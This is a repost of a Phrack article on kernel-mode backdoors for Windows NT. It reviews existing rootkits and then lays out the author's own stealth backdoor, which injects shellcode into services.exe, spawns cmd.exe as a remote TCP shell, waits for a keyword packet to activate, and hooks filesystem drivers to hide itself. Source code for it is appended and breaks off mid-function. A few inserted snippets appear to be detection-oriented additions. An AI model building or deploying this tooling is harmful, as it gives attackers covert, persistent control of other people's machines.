[Repost] Kernel-mode backdoors for Windows NT

Source: Phrack Magazine
==Phrack Inc.==

          Volume 0x0b, Issue 0x3e, Phile #0x06 of 0x10


|=---------------=[ Kernel-mode backdoors for Windows NT ]=--------------=|
|=-----------------------------------------------------------------------=|
|=-----------------=[ firew0rker <firew0rker@nteam.ru> ]=----------------=|
|=----------------=[ the nobodies <http://www.nteam.ru> ]=---------------=|

--[ Table of contents

  1 - PREFACE

  2 - OVERVIEW OF EXISTING KERNEL-MODE BACKDOORS FOR WINDOWS NT
   2.1 - NTROOTKIT
   2.2 - HE4HOOK
   2.3 - SLANRET (IERK, BACKDOOR-ALI)

  3 - STEALTH ON DISK, IN REGISTRY AND IN MEMORY

  4 - MY VARIANT: THORNY PATH
   4.1 - SHELL
   4.2 - ACTIVATION AND COMMUNICATION WITH REMOTE CLIENT
   4.3 - STEALTH ON DISK

  5 - CONCLUSION
  6 - EPILOGUE
  7 - LIST OF USED SOURCES
  8 - FILES

--[ 1 - Preface

   This article is intended for those who know the architecture of the
Windows NT kernel and the principles of operation of NT drivers. This
article examines issues involved in the development of kernel-mode tools
for stealthy remote administration of Windows NT.

   Recently there has been a tendency to extend the use of Windows NT
(2000, XP, 2003) from its classical stronghold as a home and office OS
to servers. At the same time, the outdated Windows 9x family is being
replaced by the NT family. It should therefore be evident that remote
administration tools (backdoors) and unnoticeable access tools (rootkits)
for the NT family have a certain value. Most of the published utilities
work in user mode and can thus be detected by antivirus tools or by manual
inspection.

   Tools that work in kernel mode are quite another matter: they can hide
from any user-mode program. Antivirus software has to supply kernel-mode
components in order to detect a kernel-mode backdoor. Software exists
that protects against such backdoors (such as IPD, "Integrity Protection
Driver"), but its use is not widespread. Kernel-mode backdoors are not
as widely used as they could be because of their relative complexity in
comparison with user-mode backdoors.

--[ 2 - Overview of existing Kernel-Mode backdoors for Windows NT

   This section briefly reviews existing kernel-mode backdoors for Windows
   NT.
   
----[ 2.1 - Ntrootkit
   
   Ntrootkit (c) by Greg Hoglund and a team of free developers [1] is a
device driver for Windows NT 4.0 and 2000. Its capabilities (implemented
and potential):

- Receiving commands from a remote client. The rk_packet module contains
  a simplified IP stack, which uses a free IP address from the subnet of
  the host on which Ntrootkit has been installed.

  Its MAC and IP addresses are hardcoded in the source. One connects to
  the rootkit at that IP address via a TCP connection to any port.
  The available commands in rk_command.c are:

     ps - list processes
     help - self-explanatory
     buffertest, echo and debugint - for debugging purposes
     hidedir - hide directory/file
     hideproc - hide process(es)
     sniffkeys - keyboard spy

  There are also incomplete pieces of code: executing commands received
  via a covert channel, and starting a Win32 process from a driver (a hard
  and complicated task).

- Encrypt all traffic using Schneier's Blowfish algorithm:
  rk_blowfish.c is present, but not (yet?) used

- Self-defense (rk_defense.c) - hide protected objects (in this
  case: registry keys), identified by the string "_root_"; redirect
  launched processes.

  The hiding of processes, directories and files as implemented in
  rk_ioman.c is done through hooking the following functions:
  
     NtCreateFile
     ZwOpenFile
     ZwQueryDirectoryFile
     ZwOpenKey
     ZwQueryKey
     ZwQueryValueKey
     ZwEnumerateValueKey
     ZwEnumerateKey
     ZwSetValueKey
     ZwCreateKey

  The way to detect this rootkit:

  Make a direct request to the filesystem driver by sending an IRP to it.
  There is one more module that hooks file handling: rk_files.c, adapted
  from filemon, but it is not used.

- Starting processes: An unfinished implementation of it can be found
  in rk_command.c, another one (which is almost complete and good) is
  in rk_exec.c

  The implementation suffers from the fact that Zw* functions which are
  normally unavailable to drivers directly are called through the system
  call interface (int 0x2E), leading to problems with different versions
  of the NT family as system call numbers change.

   It seems that the work on Ntrootkit is very loosely coordinated: every
developer does what (s)he considers needed or urgent. Ntrootkit does not
achieve complete (or sufficient) invisibility. It creates a device named
"Ntroot", which is visible from user mode.

   When using Ntrootkit for anything practical, one will need some means
of interaction with the rootkitted system. In short: some sort of shell
is needed. Ntrootkit itself cannot give out a shell directly, although it
can start a process -- the downside is that the I/O of that process
cannot be redirected. One is thus forced to start something like netcat.
Its process can be hidden, but its TCP connection will be visible. The
missing redirection of I/O is a big drawback.
   
   However, Ntrootkit development is still in progress, and it will
probably become a fully-functional tool for complete and stealthy remote
administration.

----[ 2.2 - He4Hook

   This description is based on [2]. Filesystem access was hooked via two
different methods in the versions up to and including 2.15b6. Only one of
them is active at a time, and in versions after 2.15b6 the first method
was removed.

Method A: hook kernel syscalls:
===============================

ZwCreateFile, ZwOpenFile    - driver version 1.12 and from 1.17 to
                      2.15beta6
IoCreateFile            - from 1.13 to 2.15beta6
ZwQueryDirectoryFile, ZwClose - before 2.15beta6

Almost all these exported functions (Zw*) have the following function
body:
  mov eax, NumberFunction
  lea edx, [esp+04h]
  int 2eh                ; Syscall interface

   The "NumberFunction" is the number of the called function in the
syscalls table (which itself can be accessed via the global variable
KeServiceDescriptorTable). This variable points to the following structure:

typedef struct SystemServiceDescriptorTable
  {
   SSD  SystemServiceDescriptors[4];
  } SSDT, *LPSSDT;

Other structures:

typedef VOID *SSTAT[];
typedef unsigned char SSTPT[];
typedef SSTAT *LPSSTAT;
typedef SSTPT *LPSSTPT;

typedef struct SystemServiceDescriptor
  {
   LPSSTAT lpSystemServiceTableAddressTable;
   ULONG  dwFirstServiceIndex;
   ULONG  dwSystemServiceTableNumEntries;
   LPSSTPT lpSystemServiceTableParameterTable;
  } SSD, *LPSSD;

The descriptor table pointed to by KeServiceDescriptorTable is only
accessible from kernel mode. There is also a second table,
KeServiceDescriptorTableShadow, which serves calls from user mode --
unfortunately it is not exported.

Base services are in

KeServiceDescriptorTable->SystemServiceDescriptors[0]
KeServiceDescriptorTableShadow->SystemServiceDescriptors[0]

KernelMode GUI services are in
KeServiceDescriptorTableShadow->SystemServiceDescriptors[1]

   The other elements of these tables were free at the time [2] was
written, in all versions up to WinNT4 (SP3-6) and Win2k build 2195.
Each element of the table is an SSD structure, which contains the
following data:

lpSystemServiceTableAddressTable   - A pointer to an array of addresses
                                     of functions that will be called if
                                     a matching syscall is called

dwFirstServiceIndex                - Start index for the first function

dwSystemServiceTableNumEntries     - Number of services in table

lpSystemServiceTableParameterTable - An array of bytes specifying the
                                     number of bytes from the stack that
                                     will be passed through

In order to hook a system call, He4HookInv replaces the address stored in
KeServiceDescriptorTable->SystemServiceDescriptors[0].lpSystemServiceTableAddressTable
with a pointer to its own table.

One can interface with He4HookInv by adding one's own services to the
system call tables. He4HookInv updates both tables:

- KeServiceDescriptorTable
- KeServiceDescriptorTableShadow.

Otherwise, if it updated only KeServiceDescriptorTable, new services
would be unavailable from user mode. To locate
KeServiceDescriptorTableShadow the following technique is used:

   The function KeAddSystemServiceTable can be used to add services to the
kernel. It can add services to both tables. Since the 0-th descriptor of
both tables is identical, it is possible to find the address of the shadow
table by scanning the code of the KeAddSystemServiceTable function. You
can see how it is done in file He4HookInv.c, function
FindShadowTable(void).

   If this method fails for some reason, a hardcoded address
(KeServiceDescriptorTable-0x230) is taken as the location of the shadow
table. This address has not changed since WinNT SP3. Another problem is
the search for the correct index into the function address array. As
almost all Zw* functions have an identical first instruction
(mov eax, NumberFunction), one can get a pointer to the function number
easily by adding one byte to the address exported by ntoskrnl.exe.
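The decoding step described above can be illustrated outside the kernel.
The following is a minimal user-mode sketch, not code from He4HookInv: it
assumes the stub starts with the x86 encoding of "mov eax, imm32" (opcode
0xB8 followed by a little-endian 32-bit immediate), and the function name
ReadServiceIndex is hypothetical.

```cpp
#include <cstdint>

// Opcode of "mov eax, imm32" on x86.
const unsigned char kMovEaxImm32 = 0xB8;

// Reads the service index from the first bytes of a Zw* stub.
// Returns false if the stub does not start with "mov eax, imm32".
// (Hypothetical helper for illustration; not part of He4HookInv.)
bool ReadServiceIndex(const unsigned char* stub, std::uint32_t* index)
{
    if (stub == nullptr || index == nullptr || stub[0] != kMovEaxImm32)
        return false;
    // The 32-bit immediate follows the opcode byte in little-endian order.
    *index = static_cast<std::uint32_t>(stub[1])
           | static_cast<std::uint32_t>(stub[2]) << 8
           | static_cast<std::uint32_t>(stub[3]) << 16
           | static_cast<std::uint32_t>(stub[4]) << 24;
    return true;
}
```

Checking the opcode first matters because the text only says that "almost
all" Zw* functions share this first instruction; a stub with a different
layout is rejected instead of being misread.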

Method B: (for driver versions 2.11 and higher)
===============================================

   The callback tables located in the DRIVER_OBJECT of the file system
drivers are patched: the IRP handlers of the needed drivers are replaced.
This includes replacing the pointers to the base function handlers
(DRIVER_OBJECT->MajorFunction) as well as replacing the pointer to the
driver's unload procedure (DRIVER_OBJECT->DriverUnload).

The following functions are handled:

IRP_MJ_CREATE
IRP_MJ_CREATE_NAMED_PIPE
IRP_MJ_CREATE_MAILSLOT
IRP_MJ_DIRECTORY_CONTROL -> IRP_MN_QUERY_DIRECTORY

For a more detailed description of the redirection of file operations
refer to the source [2].

----[ 2.3 - Slanret (IERK, Backdoor-ALI)

   The source code for this is unavailable -- it was originally
discovered by an administrator on his network. It is a normal driver
("ierk8243.sys") which periodically causes BSODs, and is visible as a
service called "Virtual Memory Manager".

      "Slanret is technically just one component of a
      root kit. It comes with a straightforward backdoor
      program: a 27 kilobyte server called "Krei" that
      listens on an open port and grants the hacker remote
      access to the system. The Slanret component is a
      seven kilobyte cloaking routine that burrows into the
      system as a device driver, then accepts commands from
      the server instructing it on what files or processes
      to conceal." [3]

--[ 3 - Stealth on disk, in registry and in memory

   The lower the level at which a rootkit intercepts I/O, the harder it
usually is to detect its presence. One would think that a reliable place
for interception would be the low-level disk operations (read/write
sectors). This would require handling all filesystems that might be on
the hard disk though: FAT16, FAT32, NTFS.

   While FAT was relatively easy to deal with (and some old DOS stealth
viruses used similar techniques) an implementation of something similar
on WinNT is a task for maniacs.

   A second place to hook would be the dispatch functions of filesystem
drivers: patch DriverObject->MajorFunction and FastIoDispatch in memory,
or patch the drivers on disk. This has the advantage of being relatively
universal and is the method used in He4HookInv.

   A third possibility is setting a filter on a filesystem driver (FSD).
This has no advantages in comparison with the previous method, but has
the drawback of being more visible (Filemon uses this approach). The
functions Zw*, Io* can also be hooked, either by manipulating the
KeServiceDescriptorTable or by directly patching the function body. It is
usually quite easy to detect that pointers in KeServiceDescriptorTable
point to strange locations or that the body of a function has changed. A
filter driver is also easy to detect by calling IoGetDeviceObjectPointer
and then checking DEVICE_OBJECT->StackSize.
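The check for table pointers that "point to strange locations" can be
sketched as a simple range test. The following is a user-mode illustration
under stated assumptions, not code from any of the tools discussed: the
table is modelled as a plain array of addresses, the kernel image range is
supplied by the caller, and the names ImageRange and
FindEntriesOutsideImage are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Address range occupied by the module that legitimately owns the
// service routines (for the base services, the kernel image itself).
struct ImageRange {
    std::uintptr_t base;
    std::size_t size;
};

// Returns the indices of all table entries whose address lies outside
// the given image range. A non-empty result suggests hooked entries.
std::vector<std::size_t> FindEntriesOutsideImage(const std::uintptr_t* table,
                                                 std::size_t count,
                                                 ImageRange image)
{
    assert(table != nullptr || count == 0);
    std::vector<std::size_t> suspicious;
    for (std::size_t i = 0; i < count; ++i) {
        const std::uintptr_t address = table[i];
        // Written as a subtraction so that base + size cannot overflow.
        const bool inside =
            address >= image.base && (address - image.base) < image.size;
        if (!inside)
            suspicious.push_back(i);
    }
    return suspicious;
}
```

A real detector would have to obtain the table and the image range from
kernel mode; this sketch only shows the comparison itself. It does not
catch hooks made by patching the function body, which need a comparison
against a known-good copy of the code.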

   All normal drivers have their own keys in the registry, namely in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

   The above-mentioned rootkits can hide registry keys, but obviously,
if the system is booted "cleanly", an administrator can see anything that
was hidden. One can also load a rootkit using ZwSetSystemInformation(
SystemLoadAndCallImage) without the need to create any registry keys. An
example of this technique can be found in [6].

   A rootkit loader in a separate file is not stealthy enough. It might be
a smarter move to patch that call into some executable file which is part
of the system boot. One can use any driver or user-mode program that works
with sufficient privileges, or any DLL it links to. One question has to be
asked though: if the newly introduced changes need to be hidden anyway,
why make two similar but differing procedures (one for hiding changes to a
file, one for hiding the existence of a file) instead of limiting
ourselves to one?

   In most cases one can target null.sys. Implementing its functionality
is as easy as "hello world", and that is why it is usually replaced with a
trojan. But if we are going to have a procedure for hiding changes to a
file, we can replace ANY driver with a trojan that will substitute the
content of the replaced file with the original content for everyone
(including the kernel). Upon startup, it will copy itself to some
allocated memory area and start a thread there.

   This will make the trojan almost unnoticeable in memory: no system
utility can see the driver any more, as it is just an anonymous memory
page amongst many. We do not even need a thread if we use the intercepted
IRP dispatch functions of some driver
(DriverObject->MajorFunction[IRP_MJ_xxx]). We can also use IoQueueWorkItem
and KeInsertQueueDpc, so no additional threads in SYSTEM will be visible
in the task manager. After this is done the trojan can unload the driver
it was started from, and reload it in a clean (unchanged) variant. As a
result, a high level of stealth will be achieved by relatively simple
means. The original content of the manipulated file could for example be
stored in the trojan's file after the trojan itself.

   It will then be sufficient to hook all FSD requests (IRP and FastIO)
and upon access change the position
(CurrentIrpStackLocation->Parameters.*.ByteOffset) and the size of the
file.
   
--[ 4 - My variant: The thorny path

----[ 4.1 - Shell

   I originally intended to do something as simple as standard user-mode
code: just pass a socket handle for stdin/stdout/stderr to the newly
created cmd.exe process. I did not find a way to open a useful socket
from a driver though, as the interface with the AFD driver (kmode core of
winsock) is undocumented. Reverse-engineering its usage was not an option
either, because changes between versions would make my technique
unreliable. I had to find a different way.

First variant
=============

   We could start our code in the context of some process, using
shellcode quite similar to that used in exploits. The code could wait for
a TCP connection and start cmd.exe with redirected I/O.

   I chose this way when I tired of trying to start a full-fledged win32
process from a driver. The shellcode is position-independent, searches for
kernel32.dll in memory and loads the winsock library. All that needs to be
done is injecting the shellcode into the address space of a process and
passing control to the entry point of the shellcode. However, in the
process of doing this the normal work of the process must not be
interrupted, because a failure in a critical system process will lead to a
failure of the whole system.

   So we need to allocate memory, write shellcode there, and create a
thread with EIP = entry point of the shellcode. Code to do this can be
found in the attached file shell.cpp. Unfortunately, CreateProcess failed
when called from a thread started in this way, most probably because
something that CreateProcess relies upon was not initialized properly in
the context of our thread. We thus need to call CreateProcess from a
thread context which has everything that CreateProcess needs initialized
-- we're going to take a thread which belongs to the process we are
intruding into (I used SetThreadContext for that). One needs to restore
the state of the thread prior to the interruption so it can continue its
normal operation.

   So we need to: save the thread context via GetThreadContext, set EIP
to our code via SetThreadContext, wait for the code to complete, and then
restore the original context again. The rest is just the usual shellcode
for Windows NT (full code in dummy4.asm).

   One unsolved problem remains: if the thread is in a waiting state, it
will not run until it wakes up. Using ZwAlertThread does not yield any
result if the thread is in a nonalertable wait state. Fortunately, the
thread in services.exe worked without a problem -- this does not imply it
will stay like this in the future though, so I continued my research:

Second variant
==============

   Things are not as easy as [4] makes them sound. Creating a
full-fledged win32 process requires its registration in the CSRSS
subsystem. This is accomplished by using CsrClientCallServer(), which
receives all necessary information about the process (handles, TID, PID,
flags). This function calls ZwRequestWaitReplyPort, which receives a
handle of a previously opened port for connection with CSRSS.

   This port is not open in the SYSTEM process context. Opening it never
succeeded (ZwConnectPort returned STATUS_PORT_CONNECTION_REFUSED).
Playing with SECURITY_QUALITY_OF_SERVICE didn't help. While disassembling
ntdll.dll I saw that ZwConnectPort calls were preceded by ZwCreateSection.
But there was no time and no desire to play with sections. Here is the
code that didn't work:

VOID InformCsrss(HANDLE hProcess,HANDLE hThread,ULONG pid,ULONG tid)
{
      CSRMSG                csrmsg;
      HANDLE                hCurProcess;
      HANDLE                handleIndex;
      PVOID                p;

      _asm int 3;

      UNICODE_STRING           PortName;
      RtlInitUnicodeString(&PortName,L"\\Windows\\ApiPort");
      static  SECURITY_QUALITY_OF_SERVICE QoS =
           {sizeof(QoS), SecurityAnonymous, 0, 0};
      /*static  SECURITY_QUALITY_OF_SERVICE QoS =
           {0x77DC0260,
           (_SECURITY_IMPERSONATION_LEVEL)2, 0x120101, 0x10000};*/
      DWORD ret=ZwConnectPort(&handleIndex,&PortName,&QoS,NULL,
                      NULL,NULL,NULL,NULL);
           
      if (!ret) {
           RtlZeroMemory(&csrmsg,sizeof(CSRMSG));
           
           csrmsg.ProcessInformation.hProcess=hProcess;
           csrmsg.ProcessInformation.hThread=hThread;
           csrmsg.ProcessInformation.dwProcessId=pid;
           csrmsg.ProcessInformation.dwThreadId=tid;
           
           csrmsg.PortMessage.MessageSize=0x4c;
           csrmsg.PortMessage.DataSize=0x34;
           
           csrmsg.CsrssMessage.Opcode=0x10000;
           
      
      ZwRequestWaitReplyPort(handleIndex,(PORT_MESSAGE*)&csrmsg,
                              (PORT_MESSAGE*)&csrmsg);
      }
}

   The solution to the problem seemed obvious: switch context to one in
which the port is open, e.g. to the context of any win32 process. I
inserted KeAttachProcess(HelperProcess) before calling Nebbett's
InformCsrss, and KeDetachProcess afterwards. The role of the HelperProcess
was taken by calc.exe.

   When I tried using KeAttachProcess that way I failed though: the
context was switched (visible using the proc command in SoftICE), but
CsrClientCallServer returned STATUS_ILLEGAL_FUNCTION. Only Uncle Bill
knows what was happening inside CSRSS.

   Wrapping the whole process creation function in
KeAttachProcess/KeDetachProcess led to the following error when calling
ZwCreateProcess: "Break Due to KeBugCheckEx (Unhandled kernel mode
exception) Error=5 (INVALID_PROCESS_ATTACH_ATTEMPT) ... ".

   A different way to execute my code in the context of an arbitrary
process is an APC. The APC may be kmode or user-mode. Since only a kmode
APC can interrupt a nonalertable wait state, all code for process
creation must run in kernel mode. Nebbett's code works normally at
  IRQL == APC_LEVEL
Code execution in the context of a given win32 process by means of APC is
implemented in the StartShell() function, in file ShellAPC.cpp.
   
Interaction with the process
=============================

   Starting a process isn't all. The backdoor still needs to communicate
with it: it is necessary to redirect its stdin/stdout/stderr to our
driver. We could do this like most "driver+app" systems: create a device
that is visible from user mode, open it using ZwOpenFile and pass the
handle to the starting process (stdin/stdout/stderr). But a named device
is not stealthy, even if we automatically create random names. This is
why I have chosen to use named pipes instead.
   
   Windows NT uses named pipes with names like Win32Pipes.%08x.%08x (where
each %08x is a random 8-digit hexadecimal number) for emulation of
anonymous pipes. If we create one more such pipe, nobody will notice.
Usually, one uses 2 anonymous pipes for redirecting the I/O of a console
application in Win32, but when using a named pipe one will be sufficient
as it is bi-directional. The driver must create a bi-directional named
pipe, and cmd.exe must use its handle as stdin/stdout/stderr.

   The handle can be opened in both kmode and user mode. The final
version uses the first variant, but I have also experimented with the
second variant -- being able to implement different variants may help
evade antiviruses. Starting a process with redirected I/O has been
completely implemented in kernel mode in the file NebbetCreateProcess.cpp.

   There are two main differences between my code and Nebbett's: the
functions that are not exported from ntoskrnl.exe but from ntdll are
dynamically imported (see NtdllDynamicLoader.cpp), and the handle to the
named pipe is opened with ZwOpenFile() and passed to the starting process
with ZwDuplicateObject with the DUPLICATE_CLOSE_SOURCE flag.

   For opening the named pipe from user mode I inject code into a
starting process. I attached the patch (NebbetCreateProcess.diff) for
educational purposes. It adds a code snippet to a starting process. The
patch writes code (generated by a C++ compiler) to a process's stack. For
independence that code is a function which accepts a pointer to a
structure containing all the necessary data (API addresses etc) as
parameter. This structure and a pointer to it are written to the stack
together with the code of the function itself. ESP of the starting thread
is set 4 bytes below the pointer to the parameters of the function, and
EIP to its entry point. Once the injected code is done executing, it
issues a CALL back to the original entry point. This example can be
modified to be yet another way of injecting code into a working userland
process from kernel mode.

----[ 4.2 - Activation and communication with the remote client

   If a listening socket is permanently open (and visible to netstat -an)
it is likely to be discovered. Even hiding the socket from netstat is
insufficient, as a simple portscan could uncover the port. To remain
stealthy a backdoor must not have any open ports visible locally or
remotely. It is necessary to use a special packet, which on the one hand
must be unambiguously identified by the backdoor as an activation signal,
yet at the same time must not be so suspicious as to trigger alerts or be
filtered by firewalls. The activation signal could e.g. be a packet
containing a given set of bytes (a keyword) at any place (header or
data) -- all other characteristics of the packet (protocol, port etc)
should be ignored. This allows for maximum flexibility to avoid
aggressive packet filters.

   Obviously, we have to implement some sort of sniffer in order to
detect such a special packet. In practice, we have several choices on how
to implement the sniffer:

1) NDIS protocol driver (advantage: possibility not only to receive
  packets, but also to send them - thus making a covert channel for
  communication with the remote client possible; disadvantage:
  difficulties with supporting all types of network devices) - applied
  in ntrootkit;

2) use the service provided by IpFilterDriver on w2k and higher
  (advantages: simple implementation and complete independence
  from the physical layer; disadvantage: receive only);

3) set up a filter on one of the network drivers through which packets
  pass (see [5]);

4) talk to the network drivers directly by some other means in order to
  receive and send packets (advantage: can do everything; disadvantage:
  unexplored area).

   I have chosen variant 2 due to its simplicity and convenience for both
described variants of starting a shell. IpFilterDriver is used only for
activation; the subsequent connection is made via TCP by means of TDI.

   An example of the usage of IpFilterDriver can be seen in Filtering.cpp
and MPFD_main.cpp. InitFiltering() loads the IpFilterDriver if it isn't
yet loaded. Then it calls SetupFiltering, which sets a filter with the
IOCTL_PF_SET_EXTENSION_POINTER IOCTL. PacketFilter() is then called on
each IP packet. If a keyword is detected, StartShellEvent is set and
causes a shell to be started.

   The variant using shellcode in an existing process works with the
network in user-mode, thus we do not need to describe anything in detail.
   
   A kernel-mode TCP shell is implemented in NtBackd00r.cpp. When cmd.exe
is started from a driver with redirected I/O, the link is maintained by
the driver. I took the tcpecho example as the base for the communication
module in order not to waste time coding a TDI client from scratch.
DriverEntry() initialises TDI, creates a listening socket and an unnamed
device for IoQueueWorkItem.

   For each connection an instance of the Session class is created. Its
OnConnect handler starts the sequence of operations for creating a
process. Since this handler is called at IRQL==DISPATCH_LEVEL, it's
impossible to do all necessary operations directly in it. It's even
impossible to start a thread because PsCreateSystemThread must be called
only at PASSIVE_LEVEL according to the DDK. Therefore the OnConnect
handler calls IoAllocateWorkItem and IoQueueWorkItem so that all further
operations are performed in the WorkItem handler (ShellStarter function)
at PASSIVE_LEVEL.

   ShellStarter calls StartShell() and creates a worker thread
(DataPumpThread) and 2 events for notifying it about arriving packets and
named pipe I/O completion. Interaction between the WorkItem/thread and the
Session class was built to take a possible sudden disconnect and freeing
of the Session into account: synchronisation is accomplished by disabling
interrupts (which is equivalent to raising IRQL to the highest level) and
by means of DriverStudio classes (SpinLock inside). The thread uses a copy
of some data that must be available even after the instance of Session
has been deleted.

   Initially, DataPumpThread starts one asynchronous read operation
(ZwReadFile) from the named pipe -- event hPipeEvents[1] notifies about
its completion. The other event hPipeEvents[0] notifies about data arrival
from the network. After that, ZwWaitForMultipleObjects, executed in a
loop, waits for one of these events. Depending on which event was
signaled, the thread does a read from the named pipe and sends data to
the client, or does a read from the FIFO and writes to the pipe. If the
Terminating flag is set, the thread closes all handles, terminates the
cmd.exe process, and then terminates itself. Data arrival is signaled by
the hPipeEvents[0] event in the Session::OnReceive and
Session::OnReceiveComplete handlers. It is also used in conjunction with
the Terminating flag to notify the thread about termination.

   Data received from the network is buffered in the pWBytePipe FIFO.
DataPumpThread reads data from the FIFO to temporary buffers which are
allocated for each I/O operation and writes data asynchronously to the
pipe (ZwWriteFile). The buffers are freed asynchronously in the
ApcCallbackWriteComplete handler.
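The buffering role of such a FIFO can be sketched with a small ring
buffer. This is a minimal single-threaded illustration, not the pWBytePipe
implementation from the attached sources (which is not shown in this
article): the class name ByteFifo and its interface are hypothetical, and
the locking that the driver needs between receive handlers and the worker
thread is deliberately left out.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Fixed-capacity byte FIFO backed by a ring buffer.
// Hypothetical stand-in for a producer/consumer byte queue; no locking.
class ByteFifo {
public:
    explicit ByteFifo(std::size_t capacity)
        : buf_(capacity), head_(0), size_(0)
    {
        assert(capacity > 0);
    }

    // Appends up to len bytes; returns how many were accepted.
    std::size_t Write(const unsigned char* data, std::size_t len)
    {
        std::size_t n = 0;
        while (n < len && size_ < buf_.size()) {
            buf_[(head_ + size_) % buf_.size()] = data[n++];
            ++size_;
        }
        return n;
    }

    // Removes up to len bytes in arrival order; returns how many were read.
    std::size_t Read(unsigned char* out, std::size_t len)
    {
        std::size_t n = 0;
        while (n < len && size_ > 0) {
            out[n++] = buf_[head_];
            head_ = (head_ + 1) % buf_.size();
            --size_;
        }
        return n;
    }

    std::size_t Size() const { return size_; }

private:
    std::vector<unsigned char> buf_;
    std::size_t head_;  // index of the oldest byte
    std::size_t size_;  // number of bytes currently stored
};
```

Write() reports a short count when the buffer is full instead of
overwriting old data, so the producer can decide whether to retry or drop.
Whether the original FIFO behaves the same way is an assumption.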

   Data transfers from the pipe to the network are also accomplished through
temporary buffers that are allocated before ZwReadFile and freed in
Session::OnSendComplete.

Paths of data streams and temporary buffers handling algorithm:

NamedPipe -(new send_buf; ZwReadFile)-> temporary buffer send_buf
        -(send)-> Network -> OnSendComplete{delete send_buf}

Network -(OnReceive)-> pWBytePipe -(new rcv_buf)-> temporary buffer rcv_buf
        -(ZwWriteFile)-> NamedPipe -> ApcCallbackWriteComplete{delete rcv_buf}

   In the Session::OnReceive handler data is written to the FIFO and the
DataPumpThread is notified about its arrival. If the transport has more
data available than indicated, another buffer is allocated to read the
rest. When the transport is done - asynchronously - the
OnReceiveComplete() handler is called, which does the same as OnReceive.

----[ 4.3 - Stealth on disk

   I've implemented a simple demo module (file Intercept.cpp) which hooks
the dispatch functions of a given filesystem driver to hide the first N
bytes of a given file. To hook an FSD, call e.g.
Intercept(L"\\FileSystem\\Fastfat"). There are only 2 FSDs that may be
necessary to hook, Fastfat and Ntfs, because NT can boot from these
filesystems.

   Intercept() replaces some driver dispatch functions
(pDriverObject->MajorFunction[...], pDriverObject->FastIoDispatch->...).

   When the hooked driver handles IRPs and FastIo calls, the corresponding
hook functions modify the file size and the current file offset. Thus all
user-mode programs see a file N bytes smaller than the original,
containing bytes N to last. This makes it possible to implement the trick
described in part 3.

--[ 5 - Conclusion

   In this article I compared 3 existing kernel-mode backdoors for
Windows NT from a programmer's point of view, and presented some ideas on
making a backdoor stealthier as well as the thorny path of writing my own
kernel-mode backdoor.

   What we did not describe was a method of hiding open sockets and TCP
connections from utilities such as netstat and fport. Netstat uses
SnmpUtilOidCpy(), and fport talks directly with drivers
(\Device\Udp and \Device\Tcp). To hide something from these and all
similar tools, it's necessary to hook the aforementioned drivers with one
of the methods mentioned in section "Stealth on disk, in registry and in
memory". I have not explored that issue yet. Its consideration probably
deserves a separate article. Advice for those who decide to move in this
direction: begin with the study of the IpLog sources [5].

--[ 6 - Epilogue

   When/if this article is published in Phrack, the article itself
(probably improved and supplemented), its Russian original, and the full
code of all examples used will be published at our site
http://www.nteam.ru

--[ 7 - List of used sources

1. http://rootkit.com
2. "LKM-attack on WinNT/Win2k"
  http://he4dev.e1.bmstu.ru/He4ProjectRepositary/HookSysCall/
3. "Windows Root Kits a Stealthy Threat"
  http://www.securityfocus.com/news/2879
4. Gary Nebbett. Windows NT/2000 Native API Reference.
5. "IP logger for WinNT/Win2k"
  http://195.19.33.68/He4ProjectRepositary/IpLog/

--[ 8 - Files

----[ 8.1 - Shell.CPP

#include "ntdll.h"
#include "DynLoadFromNtdll.h"
#include "NtdllDynamicLoader.h"

#if (DBG)
#define dbgbkpt __asm int 3
#else
#define dbgbkpt
#endif

const StackReserve=0x00100000;
const StackCommit= 0x00001000;
extern BOOLEAN Terminating;

extern "C" char shellcode[];
extern "C" const CLID_addr;
extern "C" int const sizeof_shellcode;

namespace NT {
typedef struct _SYSTEM_PROCESSES_NT4 { // Information Class 5
   ULONG NextEntryDelta;
   ULONG ThreadCount;
   ULONG Reserved1[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY BasePriority;
   ULONG ProcessId;
   ULONG InheritedFromProcessId;
   ULONG HandleCount;
   ULONG Reserved2[2];
   VM_COUNTERS VmCounters;
   SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES_NT4, *PSYSTEM_PROCESSES_NT4;
}

BOOL FindProcess(PCWSTR process, OUT NT::PCLIENT_ID ClientId)
{
      NT::UNICODE_STRING ProcessName;
      NT::RtlInitUnicodeString(&ProcessName,process);
      ULONG n=0xFFFF;
      PULONG q =
           (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
   while (NT::ZwQuerySystemInformation(
      NT::SystemProcessesAndThreadsInformation, q, n * sizeof *q, 0))
      {
           NT::ExFreePool(q);
           n*=2;
           q = (PULONG)NT::ExAllocatePool
                (NT::NonPagedPool,n*sizeof(*q));
      }

      ULONG MajorVersion;
      NT::PsGetVersion(&MajorVersion, NULL, NULL, NULL);

   NT::PSYSTEM_PROCESSES p
      = NT::PSYSTEM_PROCESSES(q);
   BOOL found=0;
      char** pp=(char**)&p;
   do
      {
           if ((p->ProcessName.Buffer)&&(!NT::RtlCompareUnicodeString
                (&p->ProcessName,&ProcessName,TRUE)))
           {
                if (MajorVersion<=4)
                      *ClientId = ((NT::PSYSTEM_PROCESSES_NT4)p)->Threads[0].ClientId;
                      else *ClientId = p->Threads[0].ClientId;
                found=1;
                break;
           }
           if (!(p->NextEntryDelta)) break;
           *pp+=p->NextEntryDelta;
      } while(1);
      
      NT::ExFreePool(q);
   return found;
}

VOID StartShell()
{
      //Search ntdll.dll in memory
      PVOID pNTDLL=FindNT();      
      //Dynamically link to functions not exported by ntoskrnl,
      //but exported by ntdll.dll
      DYNAMIC_LOAD(ZwWriteVirtualMemory)
      DYNAMIC_LOAD(ZwProtectVirtualMemory)
      DYNAMIC_LOAD(ZwResumeThread)
      DYNAMIC_LOAD(ZwCreateThread)
      HANDLE  hProcess=0,hThread;
      //Debug breakpoint
      dbgbkpt;
      NT::CLIENT_ID clid;
      //Code must be embedded into a thread that is not in a nonalertable wait state.
      //Such a thread exists in the services.exe process; let's find it
      if(!FindProcess(L"services.exe"/*L"calc.exe"*/,&clid)) {dbgbkpt;
           return;};
